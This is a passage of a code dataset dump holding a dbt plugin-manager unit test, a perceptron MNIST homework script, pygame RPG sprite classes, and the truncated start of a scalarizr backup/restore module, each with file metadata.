"usage_type": "call"}, {"api_name": "oauth2client.client", "line_number": 34, "usage_type": "name"}, {"api_name": "oauth2client.tools.run_flow", "line_number": 35, "usage_type": "call"}, {"api_name": "oauth2client.tools", "line_number": 35, "usage_type": "name"}, {"api_name": "apiclient.discovery.build", "line_number": 36, "usage_type": "call"}, {"api_name": "httplib2.Http", "line_number": 36, "usage_type": "call"}]} {"seq_id": "294449459", "text": "import pytest\nfrom dbt.plugins import PluginManager, dbtPlugin, dbt_hook\nfrom dbt.plugins.manifest import PluginNodes, ModelNodeArgs\nfrom dbt.plugins.contracts import PluginArtifacts, PluginArtifact\n\n\nclass GetNodesPlugin(dbtPlugin):\n @dbt_hook\n def get_nodes(self) -> PluginNodes:\n nodes = PluginNodes()\n nodes.add_model(\n ModelNodeArgs(\n name=\"test_name\",\n package_name=self.project_name,\n identifier=\"test_identifier\",\n schema=\"test_schema\",\n )\n )\n return nodes\n\n\nclass GetArtifactsPlugin(dbtPlugin):\n @dbt_hook\n def get_manifest_artifacts(self, manifest) -> PluginArtifacts:\n return {self.project_name: PluginArtifact()}\n\n\nclass TestPluginManager:\n @pytest.fixture\n def get_nodes_plugin(self):\n return GetNodesPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_nodes_plugins(self, get_nodes_plugin):\n return [get_nodes_plugin, GetNodesPlugin(project_name=\"test2\")]\n\n @pytest.fixture\n def get_artifacts_plugin(self):\n return GetArtifactsPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_artifacts_plugins(self, get_artifacts_plugin):\n return [get_artifacts_plugin, GetArtifactsPlugin(project_name=\"test2\")]\n\n def test_plugin_manager_init_single_hook(self, get_nodes_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin])\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n def test_plugin_manager_init_single_hook_multiple_methods(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 2\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugins[0].get_nodes\n assert pm.hooks[\"get_nodes\"][1] == get_nodes_plugins[1].get_nodes\n\n def test_plugin_manager_init_multiple_hooks(self, get_nodes_plugin, get_artifacts_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin, get_artifacts_plugin])\n assert len(pm.hooks) == 2\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n assert \"get_manifest_artifacts\" in pm.hooks\n assert len(pm.hooks[\"get_manifest_artifacts\"]) == 1\n assert pm.hooks[\"get_manifest_artifacts\"][0] == get_artifacts_plugin.get_manifest_artifacts\n\n def test_get_nodes(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n nodes = pm.get_nodes()\n assert len(nodes.models) == 2\n\n def test_get_manifest_artifact(self, get_artifacts_plugins):\n pm = PluginManager(plugins=get_artifacts_plugins)\n artifacts = pm.get_manifest_artifacts(None)\n assert len(artifacts) == 2\n", "sub_path": "tests/unit/test_plugin_manager.py", "file_name": "test_plugin_manager.py", "file_ext": "py", "file_size_in_byte": 2990, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "dbt.plugins.dbtPlugin", "line_number": 7, "usage_type": "name"}, {"api_name": "dbt.plugins.manifest.PluginNodes", "line_number": 10, "usage_type": "call"}, {"api_name": "dbt.plugins.manifest.ModelNodeArgs", "line_number": 12, "usage_type": "call"}, {"api_name": "dbt.plugins.dbt_hook", "line_number": 8, "usage_type": "name"}, {"api_name": "dbt.plugins.manifest.PluginNodes", "line_number": 9, "usage_type": "name"}, {"api_name": "dbt.plugins.dbtPlugin", "line_number": 22, "usage_type": "name"}, {"api_name": "dbt.plugins.contracts.PluginArtifact", "line_number": 25, "usage_type": "call"}, {"api_name": "dbt.plugins.dbt_hook", "line_number": 23, "usage_type": "name"}, {"api_name": "dbt.plugins.contracts.PluginArtifacts", "line_number": 24, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 41, "usage_type": "attribute"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 46, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 54, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 63, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 75, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 80, "usage_type": "call"}]} {"seq_id": "316764094", "text": "'''\nName: Sai Venkatesh Kurella\nCampus ID: VR62250\nCMSC 678 -Introduction to Machine Learning\nHomework-2\n\n'''\n\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport matplotlib.pyplot as plot\nfrom random import random,shuffle,sample\nfrom operator import itemgetter\n\n\ndef accuracy(testdata,actual_label,weights,bias): #accuracy function\n correct = 0\n for i in range(len(testdata)):\n pred = prediction(testdata[i],weights,bias)\n if pred == actual_label[i][0]: correct += 1\n return correct/float(len(testdata))*100\n\ndef prediction(inputs,weights,bias): #prediction fuction that handles inputs and weights\n activation = 0\n for input,weight in zip(inputs,weights):\n activation += input*weight + bias\n if activation > 0:\n return 1\n else:\n return -1\n\ndef perceptron(train_data,train_label,test_data,test_label,iteration): #perceptron function\n session = tf.compat.v1.Session()\n data_train = tf.compat.v1.placeholder(dtype=tf.float32,shape = [28*28])\n label_train = tf.compat.v1.placeholder(dtype= tf.float32,shape = [1])\n weight = tf.compat.v1.placeholder(dtype=tf.float32,shape=[28*28])\n\n weight = tf.multiply(data_train,label_train)\n\n weights = np.zeros(28*28)\n bias = 0\n for i in range(0,iteration):\n for j in range(0,len(train_data)):\n predict = prediction(train_data[j],weights,bias)\n if predict != train_label[j][0]:\n weights += session.run(weight,feed_dict={data_train:train_data[j],label_train:train_label[j]})\n bias += train_label[j][0]\n\n return accuracy(test_data,test_label,weights,bias),weights\n\ndef extract_data(train_images,train_labels,test_images,test_labels,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num1's\n if num_count < 500 and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num2's\n if num_count < 500 and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num_count += 1\n num_count = 0\n #Testing data\n for i in range(len(test_labels)):\n if num_count < 500 and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(test_labels)):\n #extract only num2's\n if num_count < 500 and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num_count += 1\n return image_train,label_train,image_test,label_test\n\ndef extract_data_shuffled(train_images,train_labels,test_images,test_labels,count,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num1_count,num2_count = 0,0\n for i in range(len(train_labels)):\n #extract only num1's\n if num1_count < count and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num1_count += 1\n #extract only num2's\n if num2_count < count and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num2_count += 1\n\n #shuffle training data\n train = list(zip(image_train,label_train))\n shuffle(train)\n image_train, label_train = zip(*train)\n\n #Testing data\n num1_count,num2_count = 0,0\n for i in range(len(test_labels)):\n if num1_count < count and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num1_count += 1\n #extract only num2's\n if num2_count < count and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num2_count += 1\n #shuffle testing data\n test = list(zip(image_test,label_test))\n shuffle(test)\n image_test, label_test = zip(*test)\n\n return image_train,label_train,image_test,label_test\n\ndef accuracy_iteration(train_data,train_label,test_data,test_label,iteration,num1,num2):\n\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"accuracy_iteration%s_%s%s.png\" %(iteration,num1,num2)\n plot.savefig(plot_name)\n\ndef get_score(train_images,train_labels,test_images,test_labels,iteration,num1,num2):\n weights = perceptron(train_images,train_labels,test_images,test_labels,iteration)[1]\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(weights[i])\n else:\n weight_neg.append(0)\n\n pos_test, neg_test = [], []\n\n for i in range(len(test_labels)):\n if test_labels[i][0] == num1:\n pos_test.append(test_images[i])\n else:\n neg_test.append(test_images[i])\n #calculate score for num1 images\n score_pos = []\n for i in range(len(pos_test)):\n score = 0\n for j in range(len(pos_test[i])):\n score += abs(weight_pos[j] - pos_test[i][j])\n score_pos.append(score)\n #calculate score for num2 images\n score_neg = []\n for i in range(len(neg_test)):\n score = 0\n for j in range(len(neg_test[i])):\n score += abs(weight_neg[j] - neg_test[i][j])\n score_neg.append(score)\n\n pos_test_score = list(zip(pos_test,score_pos))\n pos_test_score = sorted(pos_test_score,key=itemgetter(1),reverse = True)\n #20 best num1\n best_pos = []\n best_pos_arr = pos_test_score[0:20]\n for i in range(len(best_pos_arr)):\n best_pos.append(best_pos_arr[i][0])\n\n worst_pos_arr = pos_test_score[-21:-1]\n worst_pos = []\n for i in range(len(worst_pos_arr)):\n worst_pos.append(worst_pos_arr[i][0])\n\n neg_test_score = list(zip(neg_test,score_neg))\n neg_test_score = sorted(neg_test_score,key = itemgetter(1),reverse = True)\n #20 best num2\n best_neg = []\n best_neg_arr = neg_test_score[0:20]\n for i in range(len(best_neg_arr)):\n best_neg.append(best_neg_arr[i][0])\n #20 worst num2\n worst_neg = []\n worst_neg_arr = neg_test_score[-21:-1]\n for i in range(len(worst_neg_arr)):\n worst_neg.append(worst_neg_arr[i][0])\n\n #image plot for num1 best 20\n for i in range(len(best_pos)):\n temp = []\n for j in range(0,len(best_pos[i]),28):\n temp.append(best_pos[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num1 worst 20\n for i in range(len(worst_pos)):\n temp = []\n for j in range(0,len(worst_pos[i]),28):\n temp.append(worst_pos[i][j:j+28])\n plot.subplot(4,5,i+1)\n plot.imshow(temp,'gray_r')\n plt_name = \"worst_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num2 best 20\n for i in range(len(best_neg)):\n temp = []\n for j in range(0,len(best_neg[i]),28):\n temp.append(best_neg[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num2)\n plot.savefig(plt_name)\n\n #image plot for num2 worst 20\n for i in range(len(worst_neg)):\n temp = []\n for j in range(0,len(worst_neg[i]),28):\n temp.append(worst_neg[i][j:j+28])\n plot.subplot(4,5,i+1)\n plot.imshow(temp,'gray_r')\n plt_name = \"worst_20_%s.png\"%(num2)\n plot.savefig(plt_name)\n\ndef visualize_weight_vector(train_data,train_label,test_data,test_label,iteration,num1,num2):\n weights = perceptron(train_data,train_label,test_data,test_label,iteration)[1]\n\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(abs(weights[i]))\n else:\n weight_neg.append(0)\n pos_weight,neg_weight = [],[]\n\n for i in range(0,len(weight_pos),28):\n pos_weight.append(weight_pos[i:i+28])\n for i in range(0,len(weight_neg),28):\n neg_weight.append(weight_neg[i:i+28])\n\n plot.imshow(pos_weight,'gray_r')\n plt_name = \"weight_%s.png\"%(num1)\n plot.savefig(plt_name)\n plot.imshow(neg_weight,'gray_r')\n plt_name = \"weight_%s.png\"%(num2)\n plot.savefig(plt_name)\n \n \ndef sorted_data_visualization(train_data,train_label,test_data,test_label,iteration,num1,num2):\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"sorted_accuracy_iteration%s%s.png\" %(num1,num2)\n plot.savefig(plot_name)\n\ndef random_flip(train_data,train_label,test_data,test_label,iteration): #functon for random flip\n index = sample(range(1000), 100)\n\n for i in index:\n if train_label[i] == [1]:\n train_label[i][0] = -1\n else:\n train_label[i][0] = 1\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot.savefig('accuracy_random_flip.png')\n return perceptron(train_data,train_label,test_data,test_label,iteration)[0]\n\n\n\ndef main():\n print(\"Importing MNIST Dataset\")\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,1,6)\n\n print(\"(a). Accuracy for classifying digits 1 and 6\\n(b). Accuracy plot with number of iterations for classifying digits 1 and 6\\n(c). Visualization of learned model for digits 1 and 6\\n(d). Visualization of 20 best and worst scoring images\\n(e). Random flip for 10% of training data\\n(f). Visualization of sorted training data\\n(g). Accuracy plot for digits 2 and 8\\n(h). Weight vector Visualization for digits 2 and 8\\n(i). Accuracy plot with 10 training examples\\n\")\n\n choice = input(\"***Please enter your choice from a to i***\")\n if choice == 'a':\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,6)[0]\n print(\"Accuracy for classifying digits 1 and 6 is:\",accuracy)\n elif choice == 'b':\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Accuracy-iteration plot for digits 1 and 6 ploted!\")\n elif choice == 'c':\n visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Learned model for digits 1 and 6 plotted!\")\n elif choice == 'd':\n print(\"Image plot for best and worst 20 images\")\n get_score(train_images,train_labels,test_images,test_labels,10,1,6)\n elif choice == 'e':\n accuracy_random = random_flip(train_images,train_labels,test_images,test_labels,10)\n print(\"Accuracy for classifying digits 1 and 6 with 10%\\ random flip\",accuracy_random)\n print(\"Accuracy plot with 10% \\error plotted!\")\n elif choice == 'f':\n train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted = extract_data(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,1,6)\n sorted_data_visualization(train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted,10,1,6)\n print(\"Accuracy plot with sorted data plotted!\")\n elif choice == 'g':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,2,8)\n print(\"Accuracy-iteration plot for digits 2 and 8 plotted!\")\n elif choice == 'h':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n print(\"Accuracy for digits 2 and 8\",accuracy)\n visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,2,8)\n print(\"Learned model for digits 2 and 8 plotted!\")\n elif choice == 'i':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,5,1,6)\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n print(\"Accuracy with 10 training examples\",accuracy)\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Plot for 10 training examples plotted!!\")\n\n\n\n\n\nif __name__ ==\"__main__\":\n main()\n", "sub_path": "perceptron.py", "file_name": "perceptron.py", "file_ext": "py", "file_size_in_byte": 13686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tensorflow.compat.v1.Session", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 106, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "operator.itemgetter", "line_number": 178, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 305, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 305, "usage_type": "name"}]} {"seq_id": "303478693", "text": "import random\nimport itertools\nimport pygame as pg\n\nimport prepare\nimport tools\n\n\nSPRITE_SIZE = (32, 36)\n\n\nclass RPGSprite(pg.sprite.Sprite):\n \"\"\"Base class for player and AI sprites.\"\"\"\n def __init__(self, pos, speed, name, facing=\"DOWN\", *groups):\n super(RPGSprite, self).__init__(*groups)\n self.speed = speed\n self.name = name\n self.direction = facing\n self.old_direction = None \n self.direction_stack = [] \n self.redraw = True \n self.animate_timer = 0.0\n self.animate_fps = 10.0\n self.walkframes = None\n self.walkframe_dict = self.make_frame_dict(self.get_frames(name))\n self.adjust_images()\n self.rect = self.image.get_rect(center=pos)\n\n def get_frames(self, character):\n \"\"\"Get a list of all frames.\"\"\"\n sheet = prepare.GFX[character]\n all_frames = tools.split_sheet(sheet, SPRITE_SIZE, 3, 4)\n return all_frames\n\n def make_frame_dict(self, frames):\n \"\"\"Create a dictionary of animation cycles for each direction.\"\"\"\n frame_dict = {}\n for i,direct in enumerate(prepare.DIRECTIONS):\n frame_dict[direct] = itertools.cycle([frames[i][0], frames[i][2]])\n return frame_dict\n\n def adjust_images(self, now=0):\n \"\"\"Update the sprites walkframes as the sprite's direction changes.\"\"\"\n if self.direction != self.old_direction:\n self.walkframes = self.walkframe_dict[self.direction]\n self.old_direction = self.direction\n self.redraw = True\n self.make_image(now)\n\n def make_image(self, now):\n \"\"\"Update the sprite's animation as needed.\"\"\"\n if self.redraw or now-self.animate_timer > 1000/self.animate_fps:\n self.image = next(self.walkframes)\n self.animate_timer = now\n self.redraw = False\n\n def add_direction(self, direction):\n \"\"\"\n Add direction to the sprite's direction stack and change current\n direction.\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n self.direction_stack.append(direction)\n self.direction = direction\n\n def pop_direction(self, direction):\n \"\"\"\n Remove direction from direction stack and change current direction\n to the top of the stack (if not empty).\n \"\"\"\n if direction in self.direction_stack:\n self.direction_stack.remove(direction)\n if self.direction_stack:\n self.direction = self.direction_stack[-1]\n\n def update(self, now, screen_rect):\n \"\"\"Update image and position of sprite.\"\"\"\n self.adjust_images(now)\n if self.direction_stack:\n direction_vector = prepare.DIRECT_DICT[self.direction]\n self.rect.x += self.speed*direction_vector[0]\n self.rect.y += self.speed*direction_vector[1]\n\n def draw(self, surface):\n \"\"\"Draw sprite to surface (not used if using group draw functions).\"\"\"\n surface.blit(self.image, self.rect)\n \n\nclass Player(RPGSprite):\n \"\"\"This class will represent the user controlled character.\"\"\"\n def __init__(self, pos, speed, name=\"warrior_m\", facing=\"DOWN\", *groups):\n super(Player, self).__init__(pos, speed, name, facing, *groups)\n\n def get_event(self, event):\n \"\"\"Handle events pertaining to player control.\"\"\"\n if event.type == pg.KEYDOWN:\n self.add_direction(event.key)\n elif event.type == pg.KEYUP:\n self.pop_direction(event.key)\n\n def update(self, now, screen_rect):\n \"\"\"Call base classes update method and clamp player to screen.\"\"\"\n super(Player, self).update(now, screen_rect)\n self.rect.clamp_ip(screen_rect)\n\n def add_direction(self, key):\n \"\"\"Remove direction from stack if corresponding key is released.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).add_direction(prepare.CONTROLS[key])\n\n def pop_direction(self, key):\n \"\"\"Add direction to stack if corresponding key is pressed.\"\"\"\n if key in prepare.CONTROLS:\n super(Player, self).pop_direction(prepare.CONTROLS[key])\n\n\nclass AISprite(RPGSprite):\n \"\"\"A non-player controlled sprite.\"\"\"\n def __init__(self, pos, speed, name, facing, *groups):\n super(AISprite, self).__init__(pos, speed, name, facing, *groups)\n self.wait_range = (500, 2000)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = 0.0\n self.change_direction()\n\n def update(self, now, screen_rect):\n \"\"\"\n Choose a new direction if wait_time has expired or the sprite\n attempts to leave the screen.\n \"\"\"\n if now-self.wait_time > self.wait_delay:\n self.change_direction(now)\n super(AISprite, self).update(now, screen_rect)\n if not screen_rect.contains(self.rect):\n self.change_direction(now)\n self.rect.clamp_ip(screen_rect)\n\n def change_direction(self, now=0):\n \"\"\"\n Empty the stack and choose a new direction. The sprite may also\n choose not to go idle (choosing direction=None)\n \"\"\"\n self.direction_stack = []\n direction = random.choice(prepare.DIRECTIONS+(None,))\n if direction:\n super(AISprite, self).add_direction(direction)\n self.wait_delay = random.randint(*self.wait_range)\n self.wait_time = now\n", "sub_path": "actors.py", "file_name": "actors.py", "file_ext": "py", "file_size_in_byte": 5462, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.sprite", "line_number": 12, "usage_type": "attribute"}, {"api_name": "prepare.GFX", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tools.split_sheet", "line_number": 32, "usage_type": "call"}, {"api_name": "prepare.DIRECTIONS", "line_number": 38, "usage_type": "attribute"}, {"api_name": "itertools.cycle", "line_number": 39, "usage_type": "call"}, {"api_name": "prepare.DIRECT_DICT", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 99, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 109, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 110, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 114, "usage_type": "attribute"}, {"api_name": "prepare.CONTROLS", "line_number": 115, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 145, "usage_type": "call"}, {"api_name": "prepare.DIRECTIONS", "line_number": 145, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 148, "usage_type": "call"}]} {"seq_id": "610082893", "text": "from __future__ import with_statement\n\nimport sys\nimport logging\n\nfrom scalarizr import storage2, util\nfrom scalarizr.libs import bases\n\nLOG = logging.getLogger(__name__)\n\n\nclass Error(Exception):\n pass\n\n\nbackup_types = {}\nrestore_types = {}\n\n\ndef backup(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return backup(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = backup_types[type_]\n except KeyError:\n msg = \"Unknown backup type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.backup_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\ndef restore(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return restore(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = restore_types[type_]\n except KeyError:\n msg = \"Unknown restore type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.restore_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\nclass Backup(bases.Task):\n features = {\n 'start_slave': True\n }\n\n def __init__(self,\n type='base',\n description=None,\n tags=None,\n **kwds):\n super(Backup, self).__init__(\n type=type,\n description=description,\n tags=tags or {},\n **kwds)\n\n\nclass Restore(bases.Task):\n\n features = {\n 'master_binlog_reset': False\n }\n '''\n When 'master_binlog_reset' = False,\n rolling this restore on Master causes replication binary log reset.\n Slaves should start from the binary log head. Detecting the first\n position in binary log is implementation dependent and Master is\n responsible for this.\n '''\n\n def __init__(self,\n type='base',\n **kwds):\n super(Restore, self).__init__(\n type=type,\n **kwds)\n\n\nbackup_types['base'] = Backup\nrestore_types['base'] = Restore\n\n\nclass SnapBackup(Backup):\n\n def __init__(self,\n 